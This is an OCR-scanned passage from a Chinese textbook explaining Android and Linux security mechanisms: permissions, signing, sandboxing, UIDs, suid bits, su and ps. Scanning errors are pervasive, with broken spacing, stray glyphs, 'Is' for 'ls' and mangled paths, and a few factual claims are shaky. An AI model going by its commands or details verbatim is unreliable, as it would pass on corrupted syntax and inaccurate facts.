在 Dalvik VM 运 行 


“进程 水箱" 
环境 


Framework 应 用 框架 


Android 的 底层 应 用 


3-1 Android 安全 机 制 架构 
在 本 节 的 内 容 中 ， 将 详细 讲解 Android 安全 机 制 的 基本 架构 知识 。 
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3.1.1 Android 的 安全 机 制 模型 


在 Android 系统 的 应 用 层 中 ， 提 供 了 如 下 安全 机 制 模型 。 
о 使 用 显 式 定义 经 用 户 授 权 的 应 用 权限 控制 机 制 的 方法 , 系统 规范 并 强制 各 类 应 用 程序 的 行为 准则 与 
权限 许可 。 
Па 提供 了 应 用 程序 的 签名 机 制 ， 实 现 了 应 用 程序 之 间 的 信息 信任 和 资源 共享 。 
概览 整个 Android 系统 的 框架 结构 ， 其 安全 机 制 的 具体 特点 如 下 。 
а 采用 不 同 的 层次 架构 机 制 来 保护 用 户 信息 的 安全 ， 并 且 不 同 的 层次 可 以 保证 各 种 应 用 的 灵活 性 。 
ü 鼓励 更 多 的 用 户 去 了 解 应 用 程序 的 工作 过 程 , 鼓励 用 户 花费 更 多 的 时 间 和 注意 力 来 关注 移动 设备 的 
安全 性 。 
О 无 惧 恶 意 软 件 的 威胁 ， 并 拥有 坚定 决心 消灭 这 些 威胁 。 
а 时 刻 防 范 第 三 方 恶意 应 用 程序 的 攻击 。 
O 时 刻 做 好 风险 控制 工作 ， 一 旦 安全 防护 系统 崩溃 ， 要 尽量 减少 损失 ， 并 尽快 恢复 。 
根据 上 述 模型 ，Android 安全 系统 提供 了 如 下 的 安全 机 制 。 
(OD 内 存 管理 
Android 内 存 管 理 机 制 基于 标准 Linux 的 OOM ( 低 内 存 管理 ) 机 制 ， 实 现 了 低 内 存 清 理 CLMKO 机 制 ， 
将 所 有 的 进程 按照 重要 性 进行 分 级 , 系统 会 自动 清理 最 低级 别 进程 所 占用 的 内 存 空 间 。 另 外 , 还 引入 Android 
独 有 的 共享 内 存 机 制 Ashmem， 此 机 制 具 有 清理 不 再 使 用 共享 内 存 区 域 的 能 力 。 
(2) 权限 声明 
Android 应 用 程序 需要 显 式 声 明 权 限 、 名 称 、 权 限 组 与 保护 级 别 , 只 有 这 样 才能 算是 一 个 合格 的 Android 
程序 。 在 Android 系统 中 规定 : 不 同 级 别 应 用 程序 的 使 用 权限 时 的 认证 方式 不 同 ， 有 具体 说 明 如 下 所 示 。 
O Normal 级 : 申请 后 即 可 用 。 
O Dangerous 级 : 在 安装 时 由 用 户 确认 后 方 可 用 。 
O Signature 与 Signatureorsystem 级 : 必须 是 系统 用 户 才 可 用 。 
(3) 应 用 程序 签名 
Android 应 用 程序 包 〈.apk 格式 文件 ) 必须 被 开发 者 数字 签名 ， 同 一 名 开发 者 可 以 指定 不 同 的 应 用 程序 
共享 UID， 这 样 可 以 运行 在 同一 个 进程 空间 以 实现 资源 共享 。 
(4) 访问 控制 
通过 使 用 基于 Linux 系统 的 访问 控制 机 制 ， 可 以 确保 系统 文件 与 用 户 数 据 不 受 非 法 访问 。 
(5) 进程 沙 箱 隔离 
Android 应 用 程序 安装 时 会 被 赋予 一 个 独特 的 用 户 标识 (UID〉， 这 个 标识 被 永久 保持 。 当 Android 应 
用 程序 及 其 运行 的 Dalvik VM 运行 于 独立 的 Linux 进程 空间 中 时 ， 会 将 与 UID 不 同 的 应 用 程序 隔离 出 来 。 
(6) 进程 通信 
Android 采用 Binder 机 制 提供 的 共享 内 存 实现 进程 通信 功能 ，Binder 机 制 基于 Client-Server 模式 ,提供 
了 类 似 于 COM 和 CORBA 的 轻 量 级 远程 进程 调用 (RPC) 。 通过 使 用 Binder 机 制 中 的 接口 描述 语言 (AIDL) 
来 定义 接口 与 交换 数据 的 类 型 ， 可 以 确保 进程 间 通 信 的 数据 不 会 发 生 越界 操作 ， 影 响 进程 的 空间 。 


3.1.2 Android 具有 的 权限 
Android 安全 结构 的 核心 思想 : 在 默认 的 情况 下 应 用 程序 ， 不 可 以 执行 任何 对 其 他 应 用 程序 、 系 统 或 者 


用 户 带 来 负面 影响 的 操作 。 对 于 开发 者 来 说 ， 只 有 了 解 并 把 握 Android 的 安全 架构 的 核心 ,才能 设计 出 在 使 
用 过 程 中 更 加 流畅 的 用 户 体 验 程 序 。 
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根据 用 户 的 使 用 过 程 体验 ， 可 以 将 和 Android 系统 相关 的 权限 分 为 如 下 三 类 。 

О Android 手 机 所 有 者 权限 : 自用 户 购买 Android 手 机 〈 如 Samsung СТ-19000) 后， 用 户 不 需要 输入 任 
何 密码 ， 就 具有 安装 一 般 应 用 软件 、 使 用 应 用 程序 等 的 权限 。 

Q Android root 权 限 : 该 权限 为 Android 系 统 的 最 高 权限 ， 可 以 对 所 有 系统 中 文件 、 数 据 进行 任意 操作 。 
出 厂 时 默认 没有 该 权限 ,需要 使 用 z4Root 等 软件 获取 ,但 并 不 鼓励 进行 此 操作 ， 因 为 可 能 因此 使 用 
户 失去 手机 原 厂 保修 的 权益 。 同 样 ， 如 果 将 Android 手 机 进行 root 权 限 提升 ， 则 此 后 用 户 不 需要 输入 
任何 密码 ， 都 将 能 以 Android root 权 限 来 使 用 手机 。 

O Android 应 用 程序 权限 : Android 提 供 了 丰富 的 SDK, 开发 人 员 可 以 根据 其 开发 Android 中 的 应 用 程序 。 
而 应 用 程序 对 Android 系 统 资源 的 访问 需要 有 相应 的 访问 权限 ， 这 个 权限 就 称 为 Android 应 用 程序 权 
限 ， 在 应 用 程序 设计 时 设 定 ， 在 Android 系 统 中 初次 安装 时 即 生 效 。 需 要 注意 的 是 ， 如 果 应 用 程序 
设计 的 权限 大 于 Android 手 机 所 有 者 权限 ， 则 该 应 用 程序 无 法 运行 。 例 如 ， 没 有 获取 Android root 权 
限 的 手机 无 法 运行 Root Explorer， 因 为 运行 该 应 用 程序 需要 Android root 权 限 。 


3.1.3 Android 的 组 件 模型 (Component Model) 


整个 Android 系统 中 包括 4 种 组 件 ， 具 体 说 明 如 下 。 

Q Activity: Activity 就 是 一 个 界面 ,这 个 界面 中 可 以 放置 各 种 控件 , 例如 ，Task Manager 的 界面 、Root 
Explorer 的 界面 等 。 

O Service: 服务 是 运行 在 后 台 的 功能 模块 ， 如 文件 下 载 、 音 乐 播放 程序 等 。 

Q Content Provider: 是 Android 平 台 应 用 程序 间 数 据 共享 的 一 种 标准 接口 ， 以 类 似 于 URI (Universal 
Resources Identification) 的 方式 来 表示 数据 ， 例 如 ，content:Wcontacts/people/1101 。 

Q Broadcast Receiver: 与 Broadcast Receiver 组 件 相关 的 概念 是 Intent，Intent 是 一 个 对 动作 和 行为 的 抽 
象 描述 ， 负 责 组 件 之 间 及 程序 之 间 进 行 消息 传递 。 而 Broadcast Receiver 组 件 则 提供 了 一 种 把 Intent 
作为 一 个 消息 广播 出 去 ， 由 所 有 对 其 感 兴趣 的 程序 对 其 作出 反应 的 机 制 。 


3.1.4 Android 安全 访问 设置 


在 Android 系统 中 ， 每 个 应 用 程序 的 APK (Android Package) 包 中 都 会 包含 一 个 AndroidManifest.xml 
文件 ， 该 文件 除了 罗列 应 用 程序 运行 时 库 、 运 行 依赖 关系 等 之 外 ， 还 会 详细 地 罗列 出 该 应 用 程序 所 需 的 系 
统 访问 。AndroidManifest.xml 文件 的 基本 格式 如 下 所 示 。 

<?xml version="1.0" encoding="utf-8"?> 

«manifest xmlns:android="http://schemas.android.com/apk/res/android" 

package="cn.com.fetion.android" 
android:versionCode="1" 
android:versionName="1.0.0"> 
«application android:icon="@drawable/icon" android:label="@string/app_name"> 
«activity android:name=".welcomActivity" 
android:label="@string/app_name"> 
<intent-filter> 
«action android:name="android.intent.action. MAIN" /> 
«category android:name="android.intent.category._LAUNCHER" /> 
</intent-filter> 
</activity> 
</application> 
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<uses-permission 
android:name="android.permission.SEND_SMS"></uses-permission> 
</manifest> 
上 述 代码 中 的 粗 斜 体 部 分 是 声明 该 软件 具备 发 送 短信 的 功能 。 在 Android RZ, 一共 定 义 了 100 多 种 
permission 供 开 发 人 员 使 用 。 


3.2 Linux 系统 的 安全 机 制 


ба 知识 点 讲解 : 光盘 :视频 \ 知 识 点 \ 第 3 章 \Linux 系统 的 安全 机 制 .avi 

因为 Android 系统 是 基于 Linux 内 核 的 ， 所 以 在 学 习 Android 的 安全 机 制 之 前 需要 先 掌握 Linux 安全 机 
制 的 知识 。 本 节 将 详细 讲解 Linux 用 户 权 限 、 进 程 和 内 存 空间 方面 的 知识 ， 为 读者 学 习 本 书后 面 的 知识 打下 
基础 。 


3.2.1 root 用 户 、 伪 用 户 和 普通 用 户 


在 Linux 系统 的 安全 机 制 中 ， 最 基础 的 是 用 户 与 用 户 组 。Linux 系统 的 用 户 由 用 户 名 和 用 户 标识 (UID) 
表示 ， 用 户 可 同时 参与 多 个 用 户 组 ， 每 个 用 户 组 由 组 标识 (GID) 表示。 在 Linux 系统 中 存在 3 类 用 户 ， 分 
别 是 root 用 户 、 系 统 伪 用 户 和 普通 用 户 。 

(1) 超级 用 户 

Linux 操作 系统 中 的 最 高 权限 是 root, 也 被 称 为 超级 权限 的 拥有 者 , 此 类 用 户 具 有 最 高 的 系统 权限 , UID 
为 0。 因为 root 用 户 都 能 完成 普通 用 户 无 法 执行 的 操作 , 所 以 也 将 root 称 为 超级 管理 用 户 。 在 Linux 系统 中 ， 
每 个 文件 、 目 录 和 进程 都 归属 于 某 一 个 用 户 ， 只 有 这 个 用 户 才能 操作 这 个 文件 、 目 录 和 进程 。 但 是 root 用 
户 可 以 超越 任何 用 户 和 用 户 组 来 对 文件 或 目录 进行 读 取 、 修 改 或 删除 〈 在 系统 正常 的 许可 范围 内 ) 。 可 以 
控制 程序 的 执行 和 终止 ， 可 以 对 硬件 设备 进行 添加 、 创 建 和 移 除 等 操作 ， 也 可 以 对 文件 和 目录 的 属 主 和 权 
限 进行 修改 ， 以 适合 系统 管理 的 需要 《〈 因 为 root 是 系统 中 权限 最 高 的 特权 用 户 ) 。 

在 Linux 系统 中 是 通过 UID 来 区 分 用 户 权限 级 别 的 ， 而 UID 为 0 的 用 户 被 系统 约定 为 具有 超级 权限 ， 
也 就 是 root 用 户 。 超 级 用 户 具有 在 系统 约定 的 最 高 权限 内 操作 ， 所 以 说 超级 用 户 具有 可 以 完成 系统 管理 的 
所 有 工具 ; 可 以 通过 /etc/passwd 来 查 得 UID 为 0 的 用 户 是 root， 而 且 只 有 root 对 应 的 UID 为 0， 从 这 一 点 
ЖЖ, root 用 户 在 系统 中 有 无 可 替代 的 至 高 地 位 和 无 限制 权限 。 

当 系统 默认 安装 时 ， 系 统 用 户 和 UID 是 一 对 一 的 对 应 关系 ， 即 一 个 UID 对 应 一 个 用 户 。Linux 系统 的 
用 户 身份 是 通过 UID 来 确认 的 ，UID 是 确认 用 户 权限 的 标识 ， 用 户 登录 系统 所 处 的 角色 是 通过 UID 来 实 
现 的 ， 而 并 不 是 用 户 名 。 如 果 几 个 用 户 共同 使 用 同一 个 UID， 将 是 一 件 很 危险 的 事情 。 例 如 ， 将 普通 用 户 
的 UID 改 为 0， 这 就 造成 了 系统 管理 权限 的 混乱 。 如 果 想 用 root 权限 ， 可 以 通过 su BR sudo 的 方式 来 实现 ， 
而 不 是 随意 让 一 个 用 户 和 root 来 共享 同一 个 UID. 

在 Linux 系统 中 ， 可 以 让 UID 和 用 户 实现 一 对 多 的 关系 。 例 如 ， 可 以 将 一 个 UID 为 0 的 值 分 配给 几 个 用 
户 共同 使 用 ， 这 就 实现 了 UID 和 用 户 的 一 对 多 关系 。 但 这 样 做 会 使 相同 UID 的 用 户 具 有 相同 的 身份 和 权限 ， 
会 带 来 一 定 的 风险 。 例 如 ， 在 系统 中 把 guan 这 个 普通 用 户 的 UID 改 为 0 后， 表示 普通 用 户 guan 具有 了 超级 
权限 ， 其 权限 能 力 和 root 用 户 完全 一 样 。 由 此 可 见 ，UID 为 0 的 用 户 就 是 root ，root 用 户 的 UID 就 是 0。 

UID 和 用 户 的 一 对 一 的 对 应 关系 ， 是 管理 员 进 行 系统 管理 时 遵循 的 准则 之 一 ， 超 级 权限 保留 给 root 是 
最 好 的 选择 。 如 果 不 把 UID 的 0 值 分 享 给 其 他 用 户 使 用 ， 只 有 root 用 户 唯 一 拥有 UID=0， 那 么 root 用 户 就 


是 唯一 的 超级 权限 用 户 。 
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(2) 普通 用 户 和 伪装 用 户 

与 超级 用 户 相对 的 就 是 普通 用 户 和 虚拟 用 户 〈 也 被 称 为 伪装 用 户 ) ， 用 户 和 伪装 用 户 都 是 功能 受 限 的 
用 户 。 为 了 完成 特定 的 任务 ，Linux 系统 必须 提供 普通 用 户 和 伪装 用 户 。Linux 系统 是 一 个 多 用 户 、 多 任务 
的 操作 系统 ， 多 用 户主 要 体现 在 用 户 的 角色 的 多 样 性 ， 不 同 的 用 户 所 分 配 的 权限 也 不 同 。 其 实 这 也 是 Linux 
系统 比 Windows 系统 更 为 安全 的 最 主要 原因 。 

Linux 操作 系统 出 于 系统 管理 的 需要 , 将 某 些 关键 系统 应 用 文件 所 有 权 赋 予 某 些 系 统 伪 用 户 , 其 UID 范 
围 为 1 一 499，Linux 系统 的 伪 用 户 不 能 登录 系统 。 

Linux 操作 系统 中 的 普通 用 户 只 具备 有 限 的 访问 权限 ，UID 为 500 一 6000， 可 以 登录 系统 获得 shell, 
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在 Linux 系统 中 ， 超 级 权限 用 户 (UID 为 0 的 用 户 ) 的 主要 功能 如 下 所 示 。 

CD 对 任何 文件 、 目 录 或 进程 进行 操作 ， 这 种 操作 是 在 Linux 系统 最 高 许可 范围 内 的 操作 ， 而 有 些 操 
作 就 是 具有 超级 权限 的 root 也 无 法 完成 ， 例 如 /proc 目录 ，/proc 是 用 来 反映 系统 运行 的 实时 状态 信息 的 ， 所 
以 即使 是 root 用 户 也 无 法 操作 ， 其 权限 如 下 所 示 。 

[root@localhost ~}# pwd 

/root 

[root@localhost ~}# cd / 

[root@localhost /}# Is -ld /proc/ 

dr-xr-xr-x 134 root root 0 2005-10-27 /proc/ 

对 于 /proc 目录 来 说 ，root 用 户 只 具有 读 和 执行 权限 ， 但 绝对 没有 写 权 限 的 。 

(2) 对 于 涉及 系统 全 局 的 系统 管理 

在 Linux 系统 中 , 对 硬件 管理 、 文件 系统 管理 、 用 户 管理 和 系统 全 局 配置 等 操作 都 需要 超级 权限 来 实现 ， 
例如 使 用 adduser 添加 新 用 户 的 功能 就 需 超级 权限 的 用 户 来 完成 。 

(3) 超级 权限 的 不 可 替代 性 

因为 超级 权限 在 系统 管理 中 是 不 可 缺少 的 ， 所 以 必须 使 用 超级 权限 来 完成 系统 管理 工作 。 在 一 般 情 况 
F, 为 了 系统 安全 , 不 需要 使 用 root 用 户 来 完成 一 般 的 应 用 。 root 用 户 只 被 用 来 管理 和 维护 系统 功能 , 例如 
系统 日 志 的 查看 、 清 理 ， 用 户 添加 /删除 等 操作 。 在 不 涉及 系统 管理 的 工作 的 情况 下 ， 普 通用 户 足 可 以 完成 
基本 功能 ， 例 如 ， 编 写 文件 、 收 听 音 乐 等 。 对 于 基于 普通 应 用 程序 的 调用 工作 ， 可 以 通过 普通 用 户 来 完成 。 

当 以 普通 权限 的 用 户 登 录 系统 时 ， 有 些 系统 配置 及 系统 管理 必须 通过 超级 权限 用 户 完成 ， 例 如 ， 对 系 
统 日 志 的 管理 、 添 加 和 删除 用 户 。 获 取 超 级 权限 的 过 程 ， 就 是 切换 普通 用 户 身份 到 超级 用 户 身份 的 过 程 ， 
这 个 过 程 主要 是 通过 su 和 sudo 来 解决 。 


3.2.3 ”文件 权限 


Linux 系统 的 用 户 对 系统 资源 拥有 具体 的 访问 权限 ， 例 如 文件 资源 。 在 Linux 系统 中 ， 系 统 资源 通常 以 
“文件 ”来 表示 。Linux 中 的 “文件 ”不 仅 限于 通常 意义 上 存储 于 物理 介质 上 的 数据 文件 ， 还 可 以 是 已 被 抽 
象 成 用 户 程序 访问 系统 资源 的 统一 接口 。 通 过 对 文件 实现 打开 、 关 闭 、 读 、 写 以 及 控制 等 操作 ， 用 户 程序 
不 但 可 以 访问 操作 系统 控制 的 各 类 设备 , 而 且 可 以 访问 内 核 的 数据 资源 与 运行 状态 . 例如 , /dev 目录 下 的 文 
件 通 常 为 系统 硬件 设备 的 访问 接口 ， 而 /proc 下 的 文件 通常 是 内 核 的 进程 控制 信息 访问 接口 。 为 了 控制 不 同 
的 用 户 对 不 同系 统 资源 的 访问 ， 在 Linux 操作 系统 中 使 用 不 同 的 用 户 权限 来 实现 访问 控制 。 

(1) 3 个 组 

在 Linux 权限 机 制 下 ， 每 个 文件 属于 一 个 用 户 和 一 个 组 ， 由 UID 与 GID 标识 其 具体 的 所 有 权 。 对 于 文 
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件 的 具体 访问 权限 ， 分 别 定义 为 可 读 (r) 、 可 写 (w) 与 可 执行 G0 三 大 类 ， 并 且 由 3 组 读 、 写 、 执 行 组 
成 的 权限 三 元 组 来 描述 相关 权限 ， 具 体 说 明 如 下 。 

о 第 1 组 : 定义 文件 所 有 者 (用 户 ) 的 权限 。 

О 第 2 组 : 定义 同 组 用 户 (GID 相 同 但 UID 不 同 的 用 户 ) 的 权限 。 

о 第 3 组 : 定义 其 他 用 户 的 权限 (GID 与 UID 都 不 同 的 用 户 》, 例如 通过 如 下 命令 可 以 获得 文件 的 权限 

设置 。 

$ Is —I /bin/foobar 

-rwxr-xr- 1root wheel 20540 Oct 26 07:49 /bin/mmm 

在 上 述 命令 中 , “-rwxrxr-” 中 的 首 字符 “-” 表 示 文 件 /binmmm 的 类 型 ， 也 有 可 能 是 如 下 件 类 型 字符 。 


d: 
1: 符号 链接 。 
c: 字符 设备 文件 。 
b: 块 设备 文件 。 
p: pipe 管 道 。 
s: socket 套 接 字 。 
在 字段 “-rwxr-xr--” 首 字符 后 面 是 3 个 三 元 组 ， 即 rwx 的 组 合 ， 其 中 ，“-” 表 示 无 相应 权限 ， 有 具体 说 
明 如 下 所 示 。 
О rwx: 表示 文件 所 有 者 〈 此 处 为 root) 可 以 进行 读 、 写 、 执 行 的 操作 。 
O rx: 表示 文件 组 用 户 〈 此 处 为 wheel 组 的 用 户 ) 没有 写 权 限 ， 但 有 可 读 和 执行 权限 。 
O r--: 表示 任何 其 他 用 户 对 本 文件 的 权限 ， 即 只 可 读 ， 没 有 写 与 执行 的 权限 。 
(2) 特殊 权限 标识 
Linux 安全 机 制 对 可 执行 的 文件 还 提供 了 特殊 的 权限 标识 ， 分 别 是 suid、sgid ЖП “ИУ” (sticky bit) 。 
这 3 个 元 素 实际 成 为 上 述 权限 三 元 组 之 外 的 第 4 个 组 , 以 suid, sgid 和 stickybit 方式 存在 。 具体 说 明 如 下 所 示 。 
口 s 或 $S (suid) : 可 执行 文件 启用 此 权限 后 可 以 得 到 获得 该 文件 所 有 者 的 全 部 权限 的 特权 ， 以 该 文件 
所 有 者 的 身份 访问 其 能 访问 的 全 部 资源 。 如 果 suid 权 限 的 文件 被 黑客 利用 ， 例 如 ， 以 suid 配 上 root 
拥有 者 ， 系 统 安全 性 将 不 复 存在 。 
O s 或 S (sgid) : 如 果 可 执行 文件 启用 此 权限 ， 则 效果 会 与 suid 相 同 ， 即 将 文件 所 有 者 换 成 用 户 组 ， 
该 文件 就 可 以 任意 存 取 整 个 用 户 组 所 能 使 用 的 系统 资源 。 
О takT (Stickybit) : 在 /tmp 和 /var/tmp 目 录 中 提供 了 供 所 有 用 户 暂 时 存 取 的 文件 ， 用 户 都 可 以 拥有 完 
整 的 权限 进入 该 目录 ， 以 便 浏览 、 删 除 和 移动 属于 自己 的 文件 。 


注意 : 因为 特殊 权限 会 导致 “特权 ”发 生 ， 所 以 说 如 果 无 特殊 需求 ， 就 不 应 该 启用 这 些 权 限 ， 避 免 出 
现 安全 漏洞 的 问题 。 


在 Linux 系统 中 ，suid、sgid 和 stickybit 会 占用 x 的 位 置 ， 大 小 写 有 区 分 。 如 果 开 启 执行 权限 GO , Jf 
且 同 时 启用 suid、sgid、stickybit 中 任意 一 个 ， 则 s 采用 小 写 替代 x。 如 果 没 有 开启 执行 权限 ， 仅 启用 suid. 
sgid、stickybit 中 任意 一 个 ， 则 采用 大 写 形式 S。 例 如 ， 想 查看 修改 用 户口 令 的 命令 passwd 的 权限 ， 则 可 以 
通过 如 下 指令 实现 。 

$ Is -I /usr/bin/passwd 

-rwsr-xr-x 1root wheel 17588 Oct2907:53 /usr/bin/passwd 

在 上 述 命令 中 ，“-rwsr-xr-x” 中 的 s 取代 了 表示 用 户 权限 的 第 一 个 三 元 组 中 的 x, s 表示 /bin/passwd Ж 
件 ， 被 设置 了 suid 和 可 执行 位 。 如 果 为 大 写 的 S， 则 表示 文件 只 被 设置 了 suid。 当 运行 passwd 时 ，passwd 
会 代表 root 用 户 执行 ， 所 以 具有 了 超级 用 户 访问 权 ， 而 不 再 代表 运行 它 的 用 户 。 运 行 /bin/passwd 文件 时 会 
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更 改 /etc/passwd 文件 的 内 容 。 尽 管 /etc/passwd 文件 的 所 有 者 是 root， 但 是 suid 使 得 /bin/passwd 以 root 用 户 
的 访问 权限 lauren 运行 , 所 以 能 够 修改 /etc/passwd 文件 。 同样 道理 , sgid 允许 用 户 程序 继承 程序 的 组 所 有 权 ， 
而 不 是 当前 用 户 的 程序 所 有 权 。 当 sgid 被 用 于 定义 目录 权限 时 ， 便 启用 了 目录 的 sgid 标志 ， 在 目录 内 创建 
的 任何 文件 将 继承 目录 的 组 。 而 “ 烙 滞 位 ” 则 通常 用 于 目录 的 属性 定义 ,现实 中 常用 的 /tmp 或 /vat/tmp 目录 
等 通常 设置 了 “ 粘 滞 位 ”， 例 如 ，t 表示 该 目录 设置 了 粘 滞 位 。 在 为 权限 为 777 的 目录 /tmp 设置 粘 滞 位 后 ， 
具有 写 权限 的 每 个 用 户 都 可 以 在 目录 下 创建 文件 ， 不 同 的 是 每 个 用 户 只 能 删除 自己 创建 的 文件 。 

例如 ， 在 如 下 指令 中 ， 如 果 /foo/mml 已 设置 执行 权限 ， 则 显示 s 与 t; 否则 /foo/mm2 没有 执行 权限 ， 采 
用 大 写 S 和 T 来 表示 。 

$ Is -Id /tmp 

drwxrwxrwt 5 root root 4096 Oct 21 07:55 /tmp 


$ Is -ld /foo/mm1 
-rwsr-sr-t 1 root root 4096 Oct 21 07: 17 /foo/mm1 


$ Is -ld /foo/mm2 
-rWSr-Sr-T 1 root root 4096 Oct 21 07: 18 /foo/mm2 


3.24. 使 用 su 命令 临时 切换 用 户 身份 


在 Linux 系统 中 ，su 命令 就 是 切换 用 户 的 工具 。 例 如 ， 当 以 普通 用 户 guan 登录 系统 后 ， 如 果 要 漆 加 用 
户 任 务 以 执行 useradd，guan 用 户 是 没有 这 个 权限 的 ， 而 这 个 权限 恰恰 由 root 所 拥有 。 解 决 上 述 问题 的 办 法 
有 两 个 ， 具 体 说 明 如 下 。 

CD 退出 guan 用 户 ， 重 新 以 root 用 户 登录 。 

(2) 不 退出 guan 用 户 ， 而 是 用 su 来 切换 到 root 下 进行 添加 用 户 的 工作 ， 等 任务 完成 后 再 退出 root. 

在 上 述 两 种 实现 方法 中 ， 可 以 发 现 通过 su 切换 的 方式 比较 简单 易 行 。 

在 Linux 系统 中 ， 通 过 su 可 以 在 用 户 之 间 实 现 切换 操作 。 当 超级 权限 用 户 root 向 普通 或 虚拟 用 户 切 换 
时 不 需要 密码 ， 而 当 普 通用 户 切换 到 其 他 用 户 时 都 需要 密码 验证 。 在 Linux 系统 中 ， 使 用 su 的 语法 格式 如 
下 所 示 。 

su [OPTION 选项 参数 ] [用 户 ] 

口 ?7-, -1, --login: 登录 并 改变 到 所 切换 的 用 户 环境 。 

О ??-c,--commmand-COMMAND: 执行 一 个 命令 ， 然 后 退出 所 切换 到 的 用 户 环境 。 

在 Linux 系统 中 , su 在 不 加 任何 参数 时 表示 默认 切换 到 root 用 户 , 但 是 并 没有 被 转 到 root 用 户 目录 下 。 
也 就 是 说 ， 这 时 虽然 是 切换 为 root 用 户 ， 但 是 并 没有 改变 root 的 登录 环境 。 可 以 在 /etc/passwd 中 得 到 用 户 
默认 的 登录 环境 ， 包 括 目录 和 SHELL 定义 等 信息 ， 例 如 : 

[beinan@localhost ~]$ su + 

Password: 

[root@localhost beinan]# pwd 

/home/guan 

Hp, su 加 参数 “-” 表 示 默 认 切 换 到 root 用 户 ， 并 且 改 变 到 root 用 户 的 环境 ， 例 如 : 

[beinan@localhost ~]$ pwd 

/home/guan 

[beinan@localhost ~]$ su - 

Password: 


[root@localhost ~}# pwd 


/root 
其 中 ，su 参数 “-” 表 示 用 户 名 ， 例 如 : 
[beinan@localhost ~]$ su - root 


e 
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Password: 
[root@localhost ~}# pwd 
/root 


(3) su 的 优 缺 点 分 析 

在 Linux 系统 中 ，su 为 管理 带 来 了 方便 ， 通 过 切换 到 root 下 的 方式 能 够 完成 所 有 的 系统 管理 。 只 要 把 
root 密码 交 给 任何 一 个 普通 用 户 ， 就 可 以 切换 到 root 来 完成 所 有 的 系统 管理 工作 。 但 是 通过 su 切换 到 root 
时 也 会 存在 不 安全 的 因素 ， 例 如 系统 有 10 个 用 户 ， 而 且 都 参与 管理 。 如 果 这 10 个 用 户 都 涉及 超级 权限 的 
和 运用， 作为 管理 员 ， 如 果 想 让 其 他 用 户 通 过 su 来 切换 到 超级 权限 的 root， 必 须 把 root 权限 密码 都 告诉 这 10 
个 用 户 。 如 果 这 10 个 用 户 都 拥有 root 权限 ， 那 么 就 都 可 以 通过 root 权限 做 任何 事 ， 这 在 一 定 程度 上 会 对 
系统 的 安全 造成 威胁 ， 因 为 无 法 保证 这 10 个 用 户 都 能 按照 正常 的 操作 流程 来 管理 系统 ， 其 中 任何 一 人 对 系 
统 操作 的 重大 失误 都 可 能 导致 系统 崩溃 或 数据 丢失 。 

由 此 可 见 ， 在 多 人 参与 的 系统 管理 中 ，su 工具 并 不 是 最 好 的 选择 ，su 工具 只 适用 于 一 两 个 用 户 参 与 管 
理 的 系统 ， 毕 竟 su 工具 并 不 能 让 普通 用 户 受 限 地 使 用 。 


3.25 ”进程 


在 Linux 系统 中 ， 每 个 执行 的 任务 都 称 为 进程 (Process) ， 例 如 ， 使 用 15 命令 浏览 目录 内 容 ， 或 查询 
日 期 时 间 输 入 的 date 命令 。 在 每 个 进程 启动 时 ， 系 统 都 会 给 它 指定 一 个 唯一 的 数值 ， 这 个 数值 称 为 “进程 
ID" (Process ID, PID) 。 如 果 要 针对 某 个 进程 进行 管理 ， 例 如 ， 结 束 进程 的 执行 ， 必 须 以 进程 ID 〈 而 不 
是 该 进程 的 名 称 ) 作为 参考 的 对 象 。 每 个 Linux 进程 都 会 存在 一 个 对 应 的 父 进程 (Parent Process) ， 而 由 这 
个 父 进 程 可 以 复制 多 个 子 进程 ， 这 是 网 络 程序 编写 时 很 常用 的 一 种 方式 ， 这 个 动作 就 称 为 Fork AA) 。 
在 现实 应 用 中 ， 最 常见 的 一 个 Fork 例子 就 是 Web 服务 器 ，Web 服务 器 通常 都 可 以 支持 多 个 客户 端的 连接 ， 
而 服务 器 方面 利用 一 个 父 进程 来 接受 客户 端的 请 求 ， 然 后 利用 Fork 来 产生 一 个 子 进程 以 处 理 后 续 的 任务 ， 
之 后 该 父 进程 就 可 再 度 回 到 等 待 客户 端 请 求 的 状态 ， 如 此 即 可 不 断 地 为 客户 端 服务 ， 如 图 3-2 所 示 。 

(1) 前 台 与 后 台 进 程 

TE Linux 系统 中 ,每 个 进程 都 可 能 以 两 种 方式 存在 : 前 台 (Foreground) 与 
Jat? (Background) 。 所 谓 前 台 进 程 ， 就 是 用 户 目 前 在 屏幕 上 进行 操作 的 进程 ; 
而 后 台 进 程 则 是 实际 上 在 操作 ， 但 在 屏幕 上 并 无 法 看 到 的 进程 。 通 常 使 用 后 台 
方式 执行 的 情况 是 ， 当 此 进程 较为 复杂 且 必 须 执行 较 长 的 时 间 时 ， 会 将 其 置 于 
后 台中 执行 ， 以 避免 占用 屏幕 的 时 间 过 久 ， 而 无 法 执行 其 他 的 进程 。 Hil IATER 

系统 的 服务 一 般 都 是 以 后 台 进程 的 方式 在 在 的 ， 而 且 都 会 驻 留 在 系统 
中 ， 直 到 关机 时 才 结 束 ， 这 类 服务 也 称 为 Daemon, fE Linux 系统 中 就 包含 许多 Daemon。 判 断 Daemon 最 
简单 的 方法 就 是 由 名 称 来 判断 ， 多 数 Daemon 都 是 由 服务 名 称 加 上 d 来 产生 的 ， 例 如 HTTP 服务 的 Daemon 
为 httpd。 

(2) 显示 目前 进程 

在 Linux RiP, ps 命令 是 Process Status 的 缩写 ， 其 功能 是 查看 目前 的 系统 中 有 哪些 进程 正在 执行 ， 
以 及 其 执行 情况 。 可 以 直接 输入 ps 命令 名 称 ， 而 无 需 在 前 面 加 任何 参数 。 如 果 直 接 执行 ps 命令 ， 则 会 发 现 
如 下 所 示 的 类 似 信息 。 

[root@ns1 ~]# ps 

PID TTY TIME CMD 

1635 pts/0 00:00:00 su 


1636 pts/0 00:00:00 bash 
1679 pts/0 00:00:00 ps 
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-ЕЖ ps 命令 的 功能 是 显示 4 个 字段 的 数据 ， 有 具体 说 明 如 下 所 示 。 


О PID: 进程 标识 (Process ID) ， 系 统 即 是 赁 着 这 个 编号 来 识别 及 处 理 此 进程 的 。 


Q TTY: Teletypewriter， 登 录 的 终端 机 编号 。 

O TIME: 此 进程 所 消耗 的 CPU 时 间 。 

O CMD: 正在 执行 的 命令 或 进程 名 称 。 

上 述 的 信息 是 ps 命令 显示 的 最 基本 数据 情形 ， 其 实 ps 支持 非常 多 的 参数 。 
(3) 显示 详细 信息 


在 Linux 系统 中 ， 如 果 需 显示 更 加 详细 的 系统 数据 ， 可 以 使 用 -! (Long) 参数 实现 。 这 样 除 了 显示 ps 
